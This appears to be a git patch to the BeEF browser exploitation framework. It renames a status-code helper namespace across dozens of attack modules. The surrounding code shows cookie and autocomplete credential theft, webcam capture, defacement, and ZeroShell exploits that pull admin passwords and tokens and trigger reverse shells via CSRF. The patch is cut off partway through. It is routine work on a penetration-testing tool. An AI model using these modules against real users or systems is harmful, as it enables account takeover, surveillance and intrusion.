From d6074de5fd44f7a348451898b068811c8152e1ef Mon Sep 17 00:00:00 2001 From: kaitoozawa Date: Sat, 27 Dec 2025 15:40:45 +1000 Subject: [PATCH 1/9] Phase 1: Module Status Code Migration --- core/main/client/are.js | 41 ------------------ core/main/client/status.js | 42 +++++++++++++++++++ core/main/handlers/modules/beefjs.rb | 2 +- core/main/handlers/modules/legacybeefjs.rb | 2 +- .../main/handlers/modules/multistagebeefjs.rb | 2 +- modules/browser/detect_extensions/command.js | 10 ++--- modules/browser/detect_mime_types/command.js | 4 +- .../browser/fingerprint_browser/command.js | 4 +- .../hooked_origin/alert_dialog/command.js | 2 +- .../hooked_origin/clear_console/command.js | 4 +- .../hooked_origin/deface_web_page/command.js | 2 +- .../deface_web_page_component/command.js | 2 +- .../get_autocomplete_creds/command.js | 2 +- .../hooked_origin/get_cookie/command.js | 4 +- .../hooked_origin/get_page_html/command.js | 4 +- modules/browser/play_sound/command.js | 4 +- modules/browser/webcam_html5/command.js | 6 +-- .../debug/test_return_ascii_chars/command.js | 4 +- .../debug/test_return_long_string/command.js | 4 +- .../command.js | 2 +- .../command.js | 8 ++-- .../command.js | 4 +- .../command.js | 4 +- .../command.js | 4 +- .../zeroshell_2_0rc2_migrate_hook/command.js | 2 +- .../command.js | 10 ++--- .../command.js | 2 +- .../zeroshell_2_0rc2_scanner/command.js | 6 +-- modules/host/clipboard_theft/command.js | 4 +- modules/host/detect_airdroid/command.js | 4 +- modules/host/detect_coupon_printer/command.js | 10 ++--- modules/host/detect_cups/command.js | 4 +- modules/host/detect_google_desktop/command.js | 4 +- modules/host/detect_local_drives/command.js | 4 +- modules/host/detect_software/command.js | 2 +- modules/host/detect_users/command.js | 16 +++---- .../host/get_internal_ip_webrtc/command.js | 11 ++--- modules/host/get_system_info_java/command.js | 4 +- .../physical_location_thirdparty/command.js | 4 +- .../misc/track_physical_movement/command.js | 4 +- modules/misc/wordpress/wp.js | 4 +- .../cross_origin_scanner_cors/command.js | 6 +-- .../cross_origin_scanner_flash/command.js | 8 ++-- modules/network/detect_burp/command.js | 4 +- modules/network/fetch_port_scanner/command.js | 22 +++++----- modules/network/get_http_servers/command.js | 8 ++-- .../network/get_ntop_network_hosts/command.js | 4 +- .../network/get_proxy_servers_wpad/command.js | 4 +- .../network/identify_lan_subnets/command.js | 8 ++-- .../command.js | 4 +- modules/network/jslanscanner/command.js | 6 +-- modules/network/ping_sweep/command.js | 6 +-- modules/network/ping_sweep_ff/command.js | 2 +- modules/network/ping_sweep_java/command.js | 4 +- modules/network/port_scanner/command.js | 2 +- .../persistence/confirm_close_tab/command.js | 4 +- modules/persistence/hijack_opener/command.js | 4 +- .../invisible_htmlfile_activex/command.js | 4 +- .../persistence/popunder_window/command.js | 4 +- modules/phonegap/phonegap_detect/command.js | 4 +- .../edge_wscript_wsh_injection/command.js | 4 +- .../fake_evernote_clipper/command.js | 2 +- .../fake_lastpass/command.js | 2 +- .../fake_notification_c/command.js | 4 +- .../spoof_addressbar_data/command.js | 2 +- .../text_to_voice/command.js | 4 +- 66 files changed, 191 insertions(+), 197 deletions(-) delete mode 100644 core/main/client/are.js create mode 100644 core/main/client/status.js diff --git a/core/main/client/are.js b/core/main/client/are.js deleted file mode 100644 index 126482a4f5..0000000000 --- a/core/main/client/are.js +++ /dev/null @@ -1,41 +0,0 @@ -// -// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net -// Browser Exploitation Framework (BeEF) - https://beefproject.com -// See the file 'doc/COPYING' for copying permission -// - -/** - * A series of functions that handle statuses, returns a number based on the function called. - * @namespace beef.are - */ - -beef.are = { - /** - * A function for handling a success status - * @memberof beef.are - * @method status_success - * @return {number} 1 - */ - status_success: function(){ - return 1; - }, - /** - * A function for handling an unknown status - * @memberof beef.are - * @method status_unknown - * @return {number} 0 - */ - status_unknown: function(){ - return 0; - }, - /** - * A function for handling an error status - * @memberof beef.are - * @method status_error - * @return {number} -1 - */ - status_error: function(){ - return -1; - } -}; -beef.regCmp("beef.are"); diff --git a/core/main/client/status.js b/core/main/client/status.js new file mode 100644 index 0000000000..e7433d9191 --- /dev/null +++ b/core/main/client/status.js @@ -0,0 +1,42 @@ +// +// Copyright (c) 2006-2025 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - https://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/** + * Status code helpers for module command results. + * Modules use these when sending results back to the BeEF server. + * @namespace beef.status + */ + +beef.status = { + /** + * Success status code + * @memberof beef.status + * @method success + * @return {number} 1 + */ + success: function(){ + return 1; + }, + /** + * Unknown status code + * @memberof beef.status + * @method unknown + * @return {number} 0 + */ + unknown: function(){ + return 0; + }, + /** + * Error status code + * @memberof beef.status + * @method error + * @return {number} -1 + */ + error: function(){ + return -1; + } +}; +beef.regCmp("beef.status"); diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index 8e4d42bc6b..821fee54d0 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb @@ -23,7 +23,7 @@ def build_beefjs!(req_host) # @note BeEF libraries: need Eruby evaluation and obfuscation beef_js_sub_files = %w[beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js - encode/json.js net/local.js init.js mitb.js geolocation.js net/dns.js net/connection.js net/cors.js net/requester.js net/xssrays.js net/portscanner.js are.js] + encode/json.js net/local.js init.js mitb.js geolocation.js net/dns.js net/connection.js net/cors.js net/requester.js net/xssrays.js net/portscanner.js status.js] # @note Load websocket library only if WS server is enabled in config.yaml beef_js_sub_files << 'websocket.js' if config.get('beef.http.websocket.enable') == true # @note Load webrtc library only if WebRTC extension is enabled diff --git a/core/main/handlers/modules/legacybeefjs.rb b/core/main/handlers/modules/legacybeefjs.rb index 240a836598..296a49d8d4 100644 --- a/core/main/handlers/modules/legacybeefjs.rb +++ b/core/main/handlers/modules/legacybeefjs.rb @@ -23,7 +23,7 @@ def legacy_build_beefjs!(req_host) # @note BeEF libraries: need Eruby evaluation and obfuscation beef_js_sub_files = %w[beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js - encode/json.js net/local.js init.js mitb.js geolocation.js net/dns.js net/connection.js net/cors.js net/requester.js net/xssrays.js net/portscanner.js are.js] + encode/json.js net/local.js init.js mitb.js geolocation.js net/dns.js net/connection.js net/cors.js net/requester.js net/xssrays.js net/portscanner.js status.js] # @note Load websocket library only if WS server is enabled in config.yaml beef_js_sub_files << 'websocket.js' if config.get('beef.http.websocket.enable') == true # @note Load webrtc library only if WebRTC extension is enabled diff --git a/core/main/handlers/modules/multistagebeefjs.rb b/core/main/handlers/modules/multistagebeefjs.rb index e054fcf5c4..a7a2343306 100644 --- a/core/main/handlers/modules/multistagebeefjs.rb +++ b/core/main/handlers/modules/multistagebeefjs.rb @@ -23,7 +23,7 @@ def multi_stage_beefjs!(req_host) # @note BeEF libraries: need Eruby evaluation and obfuscation beef_js_sub_files = %w[beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js - encode/json.js net/local.js init.js mitb.js geolocation.js net/dns.js net/connection.js net/cors.js net/requester.js net/xssrays.js net/portscanner.js are.js] + encode/json.js net/local.js init.js mitb.js geolocation.js net/dns.js net/connection.js net/cors.js net/requester.js net/xssrays.js net/portscanner.js status.js] # @note Load websocket library only if WS server is enabled in config.yaml beef_js_sub_files << 'websocket.js' if config.get('beef.http.websocket.enable') == true # @note Load webrtc library only if WebRTC extension is enabled diff --git a/modules/browser/detect_extensions/command.js b/modules/browser/detect_extensions/command.js index 87500ea151..ca7b45ac47 100644 --- a/modules/browser/detect_extensions/command.js +++ b/modules/browser/detect_extensions/command.js @@ -1099,7 +1099,7 @@ beef.execute(function() { if (!failed) { failed = true; if (e.indexOf("detect_chrome_extension") != -1) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Chrome extensions failed', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Chrome extensions failed', beef.status.error()); } } }; @@ -1108,7 +1108,7 @@ beef.execute(function() { detect_chrome_extension(chrome_extensions[i][0], chrome_extensions[i][1]); } } catch(e) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Chrome extensions failed', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Chrome extensions failed', beef.status.error()); } } else if(beef.browser.isFF()) { try { @@ -1117,7 +1117,7 @@ beef.execute(function() { if (!failed) { failed = true; if (e.indexOf("detect_firefox_extension") != -1) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Firefox extensions failed', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Firefox extensions failed', beef.status.error()); } } }; @@ -1126,11 +1126,11 @@ beef.execute(function() { detect_firefox_extension(firefox_extensions[i], i); } } catch(e) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Firefox extensions failed', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Firefox extensions failed', beef.status.error()); } } else { beef.debug('[Detect Extensions] Unspported browser'); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=unsupported browser', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=unsupported browser', beef.status.error()); } }); diff --git a/modules/browser/detect_mime_types/command.js b/modules/browser/detect_mime_types/command.js index 789a676ab6..8f0caaaeeb 100644 --- a/modules/browser/detect_mime_types/command.js +++ b/modules/browser/detect_mime_types/command.js @@ -8,11 +8,11 @@ beef.execute(function() { if (navigator.mimeTypes) { var mime_types = JSON.stringify(navigator.mimeTypes); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "mime_types=" + mime_types, beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "mime_types=" + mime_types, beef.status.success()); beef.debug("[Detect MIME Types] " + mime_types); } else { beef.debug("[Detect MIME Types] Could not retrieve supported MIME types"); - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'fail=Could not retrieve supported MIME types', beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'fail=Could not retrieve supported MIME types', beef.status.error()); } }); diff --git a/modules/browser/fingerprint_browser/command.js b/modules/browser/fingerprint_browser/command.js index 3d2d6a88e8..3fb8c1f12e 100644 --- a/modules/browser/fingerprint_browser/command.js +++ b/modules/browser/fingerprint_browser/command.js @@ -22,12 +22,12 @@ beef.execute(function() { var murmur = Fingerprint2.x64hash128(values.join(''), 31) beef.debug('[Fingerprint Browser] Fingerprint: ' + murmur); beef.debug('[Fingerprint Browser] Components: ' + JSON.stringify(components)); - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'fingerprint=' + murmur + '&components=' + JSON.stringify(components), beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'fingerprint=' + murmur + '&components=' + JSON.stringify(components), beef.status.success()); }) }, 500) } catch(e) { beef.debug('[Fingerprint Browser] Error: ' + e.message); - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'fail=' + e.message, beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'fail=' + e.message, beef.status.error()); } }); diff --git a/modules/browser/hooked_origin/alert_dialog/command.js b/modules/browser/hooked_origin/alert_dialog/command.js index d75cb57564..3b169fc11e 100644 --- a/modules/browser/hooked_origin/alert_dialog/command.js +++ b/modules/browser/hooked_origin/alert_dialog/command.js @@ -6,5 +6,5 @@ beef.execute(function() { alert("<%= @text %>"); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "text=<%= @text %>", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "text=<%= @text %>", beef.status.success()); }); diff --git a/modules/browser/hooked_origin/clear_console/command.js b/modules/browser/hooked_origin/clear_console/command.js index e5ed8e44b8..04d1114117 100644 --- a/modules/browser/hooked_origin/clear_console/command.js +++ b/modules/browser/hooked_origin/clear_console/command.js @@ -8,8 +8,8 @@ beef.execute(function() { try { beef.debug("Clearing console..."); console.clear(); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=cleared console", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=cleared console", beef.status.success()); } catch(e) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=could not clear console", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=could not clear console", beef.status.error()); } }); diff --git a/modules/browser/hooked_origin/deface_web_page/command.js b/modules/browser/hooked_origin/deface_web_page/command.js index c9cf6844e3..31fdd90990 100644 --- a/modules/browser/hooked_origin/deface_web_page/command.js +++ b/modules/browser/hooked_origin/deface_web_page/command.js @@ -9,5 +9,5 @@ beef.execute(function() { document.title = "<%= @deface_title %>"; beef.browser.changeFavicon("<%= @deface_favicon %>"); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Deface Successful", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Deface Successful", beef.status.success()); }); diff --git a/modules/browser/hooked_origin/deface_web_page_component/command.js b/modules/browser/hooked_origin/deface_web_page_component/command.js index 5bd9a46bbd..78624eb79f 100644 --- a/modules/browser/hooked_origin/deface_web_page_component/command.js +++ b/modules/browser/hooked_origin/deface_web_page_component/command.js @@ -10,5 +10,5 @@ beef.execute(function() { $j(this).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@deface_content) %>'));); }).length; - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Defaced "+ result +" elements", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Defaced "+ result +" elements", beef.status.success()); }); diff --git a/modules/browser/hooked_origin/get_autocomplete_creds/command.js b/modules/browser/hooked_origin/get_autocomplete_creds/command.js index 8cd8480649..9783f6ef78 100644 --- a/modules/browser/hooked_origin/get_autocomplete_creds/command.js +++ b/modules/browser/hooked_origin/get_autocomplete_creds/command.js @@ -23,7 +23,7 @@ beef.execute(function() { } beef.debug("[Get Autocomplete Creds] Found autocomplete data: '" + results + "'"); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'results=' + results, beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'results=' + results, beef.status.success()); } create_form = function(input_name) { diff --git a/modules/browser/hooked_origin/get_cookie/command.js b/modules/browser/hooked_origin/get_cookie/command.js index fc00572e1d..39f8142d38 100644 --- a/modules/browser/hooked_origin/get_cookie/command.js +++ b/modules/browser/hooked_origin/get_cookie/command.js @@ -5,10 +5,10 @@ // beef.execute(function() { try { - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie, beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie, beef.status.success()); beef.debug("[Get Cookie] Cookie captured: "+document.cookie); }catch(e){ - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie, beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie, beef.status.error()); beef.debug("[Get Cookie] Error"); } }); diff --git a/modules/browser/hooked_origin/get_page_html/command.js b/modules/browser/hooked_origin/get_page_html/command.js index 092e0e575a..f062ac6978 100644 --- a/modules/browser/hooked_origin/get_page_html/command.js +++ b/modules/browser/hooked_origin/get_page_html/command.js @@ -8,7 +8,7 @@ beef.execute(function() { var head = beef.browser.getPageHead(); var body = beef.browser.getPageBody(); var mod_data = 'head=' + head + '&body=' + body; - beef.net.send("<%= @command_url %>", <%= @command_id %>, mod_data, beef.are.status_success()); - return [beef.are.status_success(), mod_data]; + beef.net.send("<%= @command_url %>", <%= @command_id %>, mod_data, beef.status.success()); + return [beef.status.success(), mod_data]; }); diff --git a/modules/browser/play_sound/command.js b/modules/browser/play_sound/command.js index cd386b1aa1..d3fc570ed8 100644 --- a/modules/browser/play_sound/command.js +++ b/modules/browser/play_sound/command.js @@ -10,9 +10,9 @@ beef.execute(function() { var sound = new Audio(url); sound.play(); beef.debug("[Play Sound] Played sound successfully: " + url); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Sound Played", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Sound Played", beef.status.success()); } catch (e) { beef.debug("[Play Sound] HTML5 audio unsupported. Could not play: " + url); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=audio not supported", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=audio not supported", beef.status.error()); } }); diff --git a/modules/browser/webcam_html5/command.js b/modules/browser/webcam_html5/command.js index fcd3b42f5d..1f73dd21ff 100644 --- a/modules/browser/webcam_html5/command.js +++ b/modules/browser/webcam_html5/command.js @@ -11,7 +11,7 @@ beef.execute(function() { beef.debug('[Webcam HTML5] Browser supports WebGL'); } else { beef.debug('[Webcam HTML5] Error: WebGL is not supported'); - beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=WebGL is not supported', beef.are.status_error()); + beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=WebGL is not supported', beef.status.error()); return; } @@ -36,7 +36,7 @@ beef.execute(function() { ctx.drawImage(vid_el,0,0,width,height); beef.net.send("<%= @command_url %>",<%= @command_id %>, 'image='+can_el.toDataURL('image/png')); } else { - beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong', beef.are.status_error()); + beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong', beef.status.error()); } }; @@ -85,7 +85,7 @@ beef.execute(function() { }, false); }, function(err) { beef.debug('[Webcam HTML5] Error: getUserMedia call failed'); - beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia call failed', beef.are.status_error()); + beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia call failed', beef.status.error()); }); // Retrieve the chosen div option from BeEF and display diff --git a/modules/debug/test_return_ascii_chars/command.js b/modules/debug/test_return_ascii_chars/command.js index 00d5a1c6cc..960a4a95f6 100644 --- a/modules/debug/test_return_ascii_chars/command.js +++ b/modules/debug/test_return_ascii_chars/command.js @@ -9,8 +9,6 @@ beef.execute(function() { var str = ''; for (var i=32; i<=127;i++) str += String.fromCharCode(i); - beef.net.send("<%= @command_url %>", <%= @command_id %>, str, beef.are.status_success()); - //return [beef.are.status_success(), str]; - test_return_ascii_chars_mod_output = [beef.are.status_success(), str]; + beef.net.send("<%= @command_url %>", <%= @command_id %>, str, beef.status.success()); }); diff --git a/modules/debug/test_return_long_string/command.js b/modules/debug/test_return_long_string/command.js index 53ab587121..3487b61d33 100644 --- a/modules/debug/test_return_long_string/command.js +++ b/modules/debug/test_return_long_string/command.js @@ -13,8 +13,6 @@ beef.execute(function() { for (var i = 0; i < iterations; i++) { str += repeat_value; } - beef.net.send("<%= @command_url %>", <%= @command_id %>, str, beef.are.status_success()); - //return [beef.are.status_success(), str]; - test_return_long_string_mod_output = [beef.are.status_unknown(), str]; + beef.net.send("<%= @command_url %>", <%= @command_id %>, str, beef.status.success()); }); diff --git a/modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/command.js b/modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/command.js index 1aab1e6063..d13ccaff68 100644 --- a/modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/command.js +++ b/modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/command.js @@ -26,6 +26,6 @@ beef.execute(function() { beef.debug("[Pfsense_2_3_2_reverse_root_shell_csrf] Go to the pfSense XSS-GET vulnerable page to load the payload in pfSense context (bypass X-Frame-Origin)."); document.location = target; - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=OK: Reverse shell should have been triggered.", beef.are.status_unknown()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=OK: Reverse shell should have been triggered.", beef.status.unknown()); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js index 339886897b..996b4bf621 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js @@ -18,18 +18,18 @@ beef.execute(function() { beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){ if(response1.status_code == 200){ pwd = response1.response_body.trim(); - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.status.success()); beef.debug("[ZeroShell_2.0RC2_admin_dynamic_token] Trying to authenticate admin user to gain dynamic token with password: " + pwd); beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){ if(response2.status_code == 200){ token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40); - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.status.success()); } else { - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.", beef.status.error()); } }); } else { - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.", beef.status.error()); } }); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js index 61c3b25d17..e8d9f09f50 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js @@ -13,9 +13,9 @@ beef.execute(function() { beef.debug("[ZeroShell_2.0RC2_admin_password] Trying to retrieve admin password in plaintext: " + uri); beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){ if(response.status_code == 200){ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin password : [" + response.response_body + "]", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin password : [" + response.response_body + "]", beef.status.success()); }else{ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.status.error()); } }); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js index 7ff47723e5..84a8546c97 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js @@ -13,9 +13,9 @@ beef.execute(function() { beef.debug("[ZeroShell_2.0RC2_admin_static_token] Trying to retrieve admin static token: " + uri); beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){ if(response.status_code == 200){ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin static token : [" + response.response_body + "]", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin static token : [" + response.response_body + "]", beef.status.success()); }else{ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.status.error()); } }); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js index 7deee471db..409647ccd7 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js @@ -14,9 +14,9 @@ beef.execute(function() { beef.debug("[ZeroShell_2.0RC2_file_disclosure] Trying to retrieve local file: " + uri); beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){ if(response.status_code == 200){ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell file [" + rfile + "] content : [" + response.response_body + "]", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell file [" + rfile + "] content : [" + response.response_body + "]", beef.status.success()); }else{ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.status.error()); } }); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js index 831744c360..c781b79807 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js @@ -15,5 +15,5 @@ beef.execute(function() { var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); iframe_<%= @command_id %>.setAttribute('src', target); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=BeEF hook should be sent to ZeroShell", beef.are.status_unknown()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=BeEF hook should be sent to ZeroShell", beef.status.unknown()); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js index 92bdaebd32..79571f3f01 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js @@ -21,12 +21,12 @@ beef.execute(function() { beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){ if(response1.status_code == 200){ pwd = response1.response_body.trim(); - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.status.success()); beef.debug("[ZeroShell_2.0RC2_reverse_shell_csrf_sop] Trying to authenticate admin user to gain dynamic token with password: " + pwd); beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){ if(response2.status_code == 200){ token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40); - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.status.success()); beef.debug("[ZeroShell_2.0RC2_reverse_shell_csrf_sop] Trying to spawn a reverse-shell via CSRF in ZeroShell SOP context."); beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "Lookup", @@ -35,15 +35,15 @@ beef.execute(function() { STk: token, What: payload }, 10, 'script', false, null, function(response3){ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.", beef.are.status_unknown()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.", beef.status.unknown()); } ); } else { - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.", beef.status.error()); } }); } else { - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.", beef.status.error()); } }); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js index a4ad1647fe..d987580cc3 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js @@ -17,5 +17,5 @@ beef.execute(function() { var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); iframe_<%= @command_id %>.setAttribute('src', target); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=OK: Reverse shell should have been triggered.", beef.are.status_unknown()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=OK: Reverse shell should have been triggered.", beef.status.unknown()); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js index 5b88d50cab..502ee06a04 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js @@ -96,9 +96,9 @@ beef.execute(function() { // 